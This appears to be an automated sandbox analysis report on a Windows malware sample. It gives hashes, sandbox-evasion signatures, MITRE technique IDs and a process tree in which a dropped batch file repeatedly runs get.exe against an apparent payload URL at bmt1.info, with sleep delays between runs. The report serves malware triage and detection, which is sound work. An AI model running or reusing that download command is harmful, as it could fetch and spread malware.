7ce06db7be24664b518ff32a8de488c33fe8d19a36b9a8b4f8a34ed711e36ae9

Analysis

max time kernel
63s
max time network
57s
platform
windows7_x64
resource
win7-20220901-en
resource tags

arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
submitted
19-09-2022 19:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7ce06db7be24664b518ff32a8de488c33fe8d19a36b9a8b4f8a34ed711e36ae9.exe
Size

1013KB
MD5

2bde8bb42fd2d83e2e15b615a3ff2856
SHA1

b94ed4d2cb451091c5e308c3b940e079d00c1295
SHA256

7ce06db7be24664b518ff32a8de488c33fe8d19a36b9a8b4f8a34ed711e36ae9
SHA512

d7c250ca2f11e4b453c50941652d32edf2386dd35e84cb8852a9d1578f5252f4c8b1fa02d3b320d309f39ba953ac76fd5c344bdf93799a2ddca6c177881671cb
SSDEEP

12288:FOC+arQj0BLu0qE1lKKXW1vfQdRFJMenfY3J1JKwXBG0tQ9YtKr5vpQ:FJS0BJT3XW1wdXTfgVKyBG0mmwdvp

Score

8^/10

evasion

Malware Config

Signatures

Executes dropped EXE 6 IoCs

pid	Process
520	get.exe
1176	sleep.exe
1924	get.exe
1664	sleep.exe
1656	get.exe
1952	sleep.exe

Identifies Wine through registry keys 2 TTPs 1 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Wine	7ce06db7be24664b518ff32a8de488c33fe8d19a36b9a8b4f8a34ed711e36ae9.exe

Loads dropped DLL 8 IoCs

pid	Process
892	cmd.exe
892	cmd.exe
892	cmd.exe
892	cmd.exe
892	cmd.exe
892	cmd.exe
892	cmd.exe
892	cmd.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
1048	7ce06db7be24664b518ff32a8de488c33fe8d19a36b9a8b4f8a34ed711e36ae9.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor	get.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor	get.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor	get.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
1048	7ce06db7be24664b518ff32a8de488c33fe8d19a36b9a8b4f8a34ed711e36ae9.exe

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 1048 wrote to memory of 892	1048	7ce06db7be24664b518ff32a8de488c33fe8d19a36b9a8b4f8a34ed711e36ae9.exe	27
PID 1048 wrote to memory of 892	1048	7ce06db7be24664b518ff32a8de488c33fe8d19a36b9a8b4f8a34ed711e36ae9.exe	27
PID 1048 wrote to memory of 892	1048	7ce06db7be24664b518ff32a8de488c33fe8d19a36b9a8b4f8a34ed711e36ae9.exe	27
PID 1048 wrote to memory of 892	1048	7ce06db7be24664b518ff32a8de488c33fe8d19a36b9a8b4f8a34ed711e36ae9.exe	27
PID 892 wrote to memory of 520	892	cmd.exe	29
PID 892 wrote to memory of 520	892	cmd.exe	29
PID 892 wrote to memory of 520	892	cmd.exe	29
PID 892 wrote to memory of 520	892	cmd.exe	29
PID 892 wrote to memory of 1176	892	cmd.exe	32
PID 892 wrote to memory of 1176	892	cmd.exe	32
PID 892 wrote to memory of 1176	892	cmd.exe	32
PID 892 wrote to memory of 1176	892	cmd.exe	32
PID 892 wrote to memory of 1924	892	cmd.exe	33
PID 892 wrote to memory of 1924	892	cmd.exe	33
PID 892 wrote to memory of 1924	892	cmd.exe	33
PID 892 wrote to memory of 1924	892	cmd.exe	33
PID 892 wrote to memory of 1664	892	cmd.exe	34
PID 892 wrote to memory of 1664	892	cmd.exe	34
PID 892 wrote to memory of 1664	892	cmd.exe	34
PID 892 wrote to memory of 1664	892	cmd.exe	34
PID 892 wrote to memory of 1656	892	cmd.exe	35
PID 892 wrote to memory of 1656	892	cmd.exe	35
PID 892 wrote to memory of 1656	892	cmd.exe	35
PID 892 wrote to memory of 1656	892	cmd.exe	35
PID 892 wrote to memory of 1952	892	cmd.exe	36
PID 892 wrote to memory of 1952	892	cmd.exe	36
PID 892 wrote to memory of 1952	892	cmd.exe	36
PID 892 wrote to memory of 1952	892	cmd.exe	36

C:\Users\Admin\AppData\Local\Temp\7ce06db7be24664b518ff32a8de488c33fe8d19a36b9a8b4f8a34ed711e36ae9.exe
"C:\Users\Admin\AppData\Local\Temp\7ce06db7be24664b518ff32a8de488c33fe8d19a36b9a8b4f8a34ed711e36ae9.exe"
1⤵
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1048
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c C:\Users\Admin\AppData\Local\Temp\bt18185.bat "C:\Users\Admin\AppData\Local\Temp\7ce06db7be24664b518ff32a8de488c33fe8d19a36b9a8b4f8a34ed711e36ae9.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:892
- - C:\Users\Admin\AppData\Local\get.exe
    C:\Users\Admin\AppData\Local\get.exe http://bmt1.info/luc/lil/b51d9a
    3⤵
    - Executes dropped EXE
    - Enumerates system info in registry
    PID:520
- - C:\Users\Admin\AppData\Local\sleep.exe
    C:\Users\Admin\AppData\Local\sleep.exe 10
    3⤵
    - Executes dropped EXE
    PID:1176
- - C:\Users\Admin\AppData\Local\get.exe
    C:\Users\Admin\AppData\Local\get.exe http://bmt1.info/luc/lil/b51d9a
    3⤵
    - Executes dropped EXE
    - Enumerates system info in registry
    PID:1924
- - C:\Users\Admin\AppData\Local\sleep.exe
    C:\Users\Admin\AppData\Local\sleep.exe 10
    3⤵
    - Executes dropped EXE
    PID:1664
- - C:\Users\Admin\AppData\Local\get.exe
    C:\Users\Admin\AppData\Local\get.exe http://bmt1.info/luc/lil/b51d9a
    3⤵
    - Executes dropped EXE
    - Enumerates system info in registry
    PID:1656
- - C:\Users\Admin\AppData\Local\sleep.exe
    C:\Users\Admin\AppData\Local\sleep.exe 3600
    3⤵
    - Executes dropped EXE
    PID:1952

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\bt18185.bat

Filesize
566B

MD5
5a23a543e92fb799552c1651bba1aa9e

SHA1
2d6425c32fad5f54e5c259d68393f1fcff743214

SHA256
80398c30995e2cafa056ddfeb0ff3fa179de6c991a04dce67704d5f8d02ad9fc

SHA512
e00c588a4b2a67654f0e40c087d763e7ee751e577f6e2da1cf6d179d160a77925c91a385770af3999e1adcd7cb3fcc960a3afd3e52645ea802ce7aa3710aa351

Download Submit
C:\Users\Admin\AppData\Local\get.exe

Filesize
12KB

MD5
9dda5b6e4fcc076fe5ee770a7e3b0d99

SHA1
fce81465e237b6eb8151bcf5b477b8230af07194

SHA256
aab1d0bcecdade8c277fedfbdad55b69eebb35a3109194021ff371e6eb62e7e8

SHA512
0c85ed0f7da2668bf5ea3eba7ba7972b04deffd8e1c8e42dc66d6c6236e7ab27e6705a4f89502536f987ff39504e580bfc5d910929235ed719faf9b3229135a7

Download Submit
C:\Users\Admin\AppData\Local\get.exe

Filesize
12KB

MD5
9dda5b6e4fcc076fe5ee770a7e3b0d99

SHA1
fce81465e237b6eb8151bcf5b477b8230af07194

SHA256
aab1d0bcecdade8c277fedfbdad55b69eebb35a3109194021ff371e6eb62e7e8

SHA512
0c85ed0f7da2668bf5ea3eba7ba7972b04deffd8e1c8e42dc66d6c6236e7ab27e6705a4f89502536f987ff39504e580bfc5d910929235ed719faf9b3229135a7

Download Submit
C:\Users\Admin\AppData\Local\get.exe

Filesize
12KB

MD5
9dda5b6e4fcc076fe5ee770a7e3b0d99

SHA1
fce81465e237b6eb8151bcf5b477b8230af07194

SHA256
aab1d0bcecdade8c277fedfbdad55b69eebb35a3109194021ff371e6eb62e7e8

SHA512
0c85ed0f7da2668bf5ea3eba7ba7972b04deffd8e1c8e42dc66d6c6236e7ab27e6705a4f89502536f987ff39504e580bfc5d910929235ed719faf9b3229135a7

Download Submit
C:\Users\Admin\AppData\Local\get.exe

Filesize
12KB

MD5
9dda5b6e4fcc076fe5ee770a7e3b0d99

SHA1
fce81465e237b6eb8151bcf5b477b8230af07194

SHA256
aab1d0bcecdade8c277fedfbdad55b69eebb35a3109194021ff371e6eb62e7e8

SHA512
0c85ed0f7da2668bf5ea3eba7ba7972b04deffd8e1c8e42dc66d6c6236e7ab27e6705a4f89502536f987ff39504e580bfc5d910929235ed719faf9b3229135a7

Download Submit
C:\Users\Admin\AppData\Local\sleep.exe

Filesize
31KB

MD5
aeb20b569cade40347d78a60c6586577

SHA1
f337d4754e8374f5e7e0c2af3f94b8f8f11cfa6e

SHA256
f32076763fb172a0130ef3a3e0ce4e2a73a4eac99164cac0ecb40cbe3b31bf55

SHA512
71c40d71be78220288d3bb5faf1dbbe3c192b2ccfa4d9eb48ada5c21e22217f5842fba38b02081eef5ab83b0cfa4e2bd0c4db752b61d11cbf5d659c71687805e

Download Submit
C:\Users\Admin\AppData\Local\sleep.exe

Filesize
31KB

MD5
aeb20b569cade40347d78a60c6586577

SHA1
f337d4754e8374f5e7e0c2af3f94b8f8f11cfa6e

SHA256
f32076763fb172a0130ef3a3e0ce4e2a73a4eac99164cac0ecb40cbe3b31bf55

SHA512
71c40d71be78220288d3bb5faf1dbbe3c192b2ccfa4d9eb48ada5c21e22217f5842fba38b02081eef5ab83b0cfa4e2bd0c4db752b61d11cbf5d659c71687805e

Download Submit
C:\Users\Admin\AppData\Local\sleep.exe

Filesize
31KB

MD5
aeb20b569cade40347d78a60c6586577

SHA1
f337d4754e8374f5e7e0c2af3f94b8f8f11cfa6e

SHA256
f32076763fb172a0130ef3a3e0ce4e2a73a4eac99164cac0ecb40cbe3b31bf55

SHA512
71c40d71be78220288d3bb5faf1dbbe3c192b2ccfa4d9eb48ada5c21e22217f5842fba38b02081eef5ab83b0cfa4e2bd0c4db752b61d11cbf5d659c71687805e

Download Submit
C:\Users\Admin\AppData\Local\sleep.exe

Filesize
31KB

MD5
aeb20b569cade40347d78a60c6586577

SHA1
f337d4754e8374f5e7e0c2af3f94b8f8f11cfa6e

SHA256
f32076763fb172a0130ef3a3e0ce4e2a73a4eac99164cac0ecb40cbe3b31bf55

SHA512
71c40d71be78220288d3bb5faf1dbbe3c192b2ccfa4d9eb48ada5c21e22217f5842fba38b02081eef5ab83b0cfa4e2bd0c4db752b61d11cbf5d659c71687805e

Download Submit
\Users\Admin\AppData\Local\get.exe

Filesize
12KB

MD5
9dda5b6e4fcc076fe5ee770a7e3b0d99

SHA1
fce81465e237b6eb8151bcf5b477b8230af07194

SHA256
aab1d0bcecdade8c277fedfbdad55b69eebb35a3109194021ff371e6eb62e7e8

SHA512
0c85ed0f7da2668bf5ea3eba7ba7972b04deffd8e1c8e42dc66d6c6236e7ab27e6705a4f89502536f987ff39504e580bfc5d910929235ed719faf9b3229135a7

Download Submit
\Users\Admin\AppData\Local\get.exe

Filesize
12KB

MD5
9dda5b6e4fcc076fe5ee770a7e3b0d99

SHA1
fce81465e237b6eb8151bcf5b477b8230af07194

SHA256
aab1d0bcecdade8c277fedfbdad55b69eebb35a3109194021ff371e6eb62e7e8

SHA512
0c85ed0f7da2668bf5ea3eba7ba7972b04deffd8e1c8e42dc66d6c6236e7ab27e6705a4f89502536f987ff39504e580bfc5d910929235ed719faf9b3229135a7

Download Submit
\Users\Admin\AppData\Local\get.exe

Filesize
12KB

MD5
9dda5b6e4fcc076fe5ee770a7e3b0d99

SHA1
fce81465e237b6eb8151bcf5b477b8230af07194

SHA256
aab1d0bcecdade8c277fedfbdad55b69eebb35a3109194021ff371e6eb62e7e8

SHA512
0c85ed0f7da2668bf5ea3eba7ba7972b04deffd8e1c8e42dc66d6c6236e7ab27e6705a4f89502536f987ff39504e580bfc5d910929235ed719faf9b3229135a7

Download Submit
\Users\Admin\AppData\Local\get.exe

Filesize
12KB

MD5
9dda5b6e4fcc076fe5ee770a7e3b0d99

SHA1
fce81465e237b6eb8151bcf5b477b8230af07194

SHA256
aab1d0bcecdade8c277fedfbdad55b69eebb35a3109194021ff371e6eb62e7e8

SHA512
0c85ed0f7da2668bf5ea3eba7ba7972b04deffd8e1c8e42dc66d6c6236e7ab27e6705a4f89502536f987ff39504e580bfc5d910929235ed719faf9b3229135a7

Download Submit
\Users\Admin\AppData\Local\sleep.exe

Filesize
31KB

MD5
aeb20b569cade40347d78a60c6586577

SHA1
f337d4754e8374f5e7e0c2af3f94b8f8f11cfa6e

SHA256
f32076763fb172a0130ef3a3e0ce4e2a73a4eac99164cac0ecb40cbe3b31bf55

SHA512
71c40d71be78220288d3bb5faf1dbbe3c192b2ccfa4d9eb48ada5c21e22217f5842fba38b02081eef5ab83b0cfa4e2bd0c4db752b61d11cbf5d659c71687805e

Download Submit
\Users\Admin\AppData\Local\sleep.exe

Filesize
31KB

MD5
aeb20b569cade40347d78a60c6586577

SHA1
f337d4754e8374f5e7e0c2af3f94b8f8f11cfa6e

SHA256
f32076763fb172a0130ef3a3e0ce4e2a73a4eac99164cac0ecb40cbe3b31bf55

SHA512
71c40d71be78220288d3bb5faf1dbbe3c192b2ccfa4d9eb48ada5c21e22217f5842fba38b02081eef5ab83b0cfa4e2bd0c4db752b61d11cbf5d659c71687805e

Download Submit
\Users\Admin\AppData\Local\sleep.exe

Filesize
31KB

MD5
aeb20b569cade40347d78a60c6586577

SHA1
f337d4754e8374f5e7e0c2af3f94b8f8f11cfa6e

SHA256
f32076763fb172a0130ef3a3e0ce4e2a73a4eac99164cac0ecb40cbe3b31bf55

SHA512
71c40d71be78220288d3bb5faf1dbbe3c192b2ccfa4d9eb48ada5c21e22217f5842fba38b02081eef5ab83b0cfa4e2bd0c4db752b61d11cbf5d659c71687805e

Download Submit
\Users\Admin\AppData\Local\sleep.exe

Filesize
31KB

MD5
aeb20b569cade40347d78a60c6586577

SHA1
f337d4754e8374f5e7e0c2af3f94b8f8f11cfa6e

SHA256
f32076763fb172a0130ef3a3e0ce4e2a73a4eac99164cac0ecb40cbe3b31bf55

SHA512
71c40d71be78220288d3bb5faf1dbbe3c192b2ccfa4d9eb48ada5c21e22217f5842fba38b02081eef5ab83b0cfa4e2bd0c4db752b61d11cbf5d659c71687805e

Download Submit
memory/520-68-0x0000000000400000-0x000000000040A000-memory.dmp

Filesize
40KB

Download
memory/520-67-0x0000000000400000-0x000000000040A000-memory.dmp

Filesize
40KB

Download
memory/520-62-0x0000000000000000-mapping.dmp

Download
memory/892-66-0x0000000000130000-0x000000000013A000-memory.dmp

Filesize
40KB

Download
memory/892-90-0x0000000000130000-0x000000000013A000-memory.dmp

Filesize
40KB

Download
memory/892-75-0x0000000000130000-0x000000000013A000-memory.dmp

Filesize
40KB

Download
memory/892-97-0x0000000000130000-0x000000000013A000-memory.dmp

Filesize
40KB

Download
memory/892-76-0x0000000000130000-0x000000000013A000-memory.dmp

Filesize
40KB

Download
memory/892-65-0x0000000000130000-0x000000000013A000-memory.dmp

Filesize
40KB

Download
memory/892-92-0x0000000000130000-0x000000000013A000-memory.dmp

Filesize
40KB

Download
memory/892-57-0x0000000000000000-mapping.dmp

Download
memory/1048-74-0x0000000000400000-0x0000000000645000-memory.dmp

Filesize
2.3MB

Download
memory/1048-55-0x0000000000400000-0x0000000000645000-memory.dmp

Filesize
2.3MB

Download
memory/1048-56-0x0000000000400000-0x0000000000645000-memory.dmp

Filesize
2.3MB

Download
memory/1048-54-0x00000000759F1000-0x00000000759F3000-memory.dmp

Filesize
8KB

Download
memory/1176-72-0x0000000000000000-mapping.dmp

Download
memory/1656-93-0x0000000000400000-0x000000000040A000-memory.dmp

Filesize
40KB

Download
memory/1656-91-0x0000000000400000-0x000000000040A000-memory.dmp

Filesize
40KB

Download
memory/1656-87-0x0000000000000000-mapping.dmp

Download
memory/1664-84-0x0000000000000000-mapping.dmp

Download
memory/1924-82-0x0000000000400000-0x000000000040A000-memory.dmp

Filesize
40KB

Download
memory/1924-81-0x0000000000400000-0x000000000040A000-memory.dmp

Filesize
40KB

Download
memory/1924-78-0x0000000000000000-mapping.dmp

Download
memory/1952-95-0x0000000000000000-mapping.dmp

Download